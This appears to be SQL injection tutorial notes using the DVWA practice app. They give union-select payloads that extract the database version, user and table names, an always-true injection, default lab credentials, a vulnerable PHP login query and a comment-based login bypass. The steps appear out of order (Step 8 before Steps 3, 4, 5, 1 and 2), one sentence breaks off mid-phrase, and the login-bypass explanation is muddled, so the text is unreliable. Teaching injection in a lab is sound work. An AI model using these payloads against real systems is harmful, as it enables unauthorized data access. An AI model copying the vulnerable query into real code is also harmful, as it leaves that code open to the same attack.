SQL Injection
SQL Injection
Step 8: Display all the user tables in information_schema : Enter the SQL code (%' and 1=0 union select null,
table_name from information_schema.tables where table_name like 'user%'# )
Let’s change the ID parameter of the URL to a number like 1,2,3,4 etc. That will also return the First_name and
Surname of all users as follows:
ID: 2 | First name: Gordon | Surname: Brown
ID: 3 |First name: Hack |Surname: Me
ID: 4 |First name: Pablo |Surname: Picasso
If you were executing this command directly on the DVWA database, the query for User ID 3 would look like
this: SELECT first_name, last_name FROM users WHERE user_id = '3';
Step 3: Always True Scenario : An advanced method to extract all the First_names and Surnames from the
The percentage % sign does not equal anything and will be false. The '1'='1' query is registered as True since 1
will always equal 1. If you were executing that on a database, the query would look like this:
SELECT first_name, last_name FROM users WHERE user_id = '%' or '1'='1';
Step 4: Display Database Version : To know the database version the DVWA application is running on, enter
the text below in the User ID field.
%' or 0=0 union select null, version() #
The database version will be listed under surname in the last line as shown in the image below.
Step 5: Display Database User : To display the Database user who executed the PHP code powering the
database, enter the text below in the USER ID field.
%' or 0=0 union select null, user() #
Step 1: Setup DVWA for SQL Injection :- 127.0.0.1/dvwa/login.php Log in using the username “admin” and
password as “password”. These are the default DVWA login credentials. After a successful login, set the DVWA
security to LOW then click on SQL Injection on the left-side menu.
Step 2: Basic Injection : On the User ID field, enter “1” and click Submit.That is supposed to print the ID,
First_name, and Surname on the screen as you can see below. The SQL syntax being exploited here is:
Process: Let’s take a simple scenario where we have a web application with a login form
with username and password fields. If the developer used PHP for development, the code
would look like this:
<?php
$query = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "'";
$query .= " AND password = '" . $_POST['password'] . "'";
?>
If a user UTKARSH with the password ‘12345’ wanted to log in, after clicking the Submit or the
Log in button, the query that would be sent to the database would look like this:
SELECT * FROM users WHERE username=‘UTKARSH' AND password='12345‘
If an attacker knew the username and wanted to bypass the login window,
they would put something like UTKARSH;-- in the username field. The resulting SQL query
would look like this:
SELECT * FROM users WHERE username=‘UTKARSH'; -- ' AND password='1111'
What the attacker has done, is adding the -- (double-dash) which comments the rest of the SQL
statement.
The above query will return the information entered in the password field making it easier for
the attacker to bypass the login screen.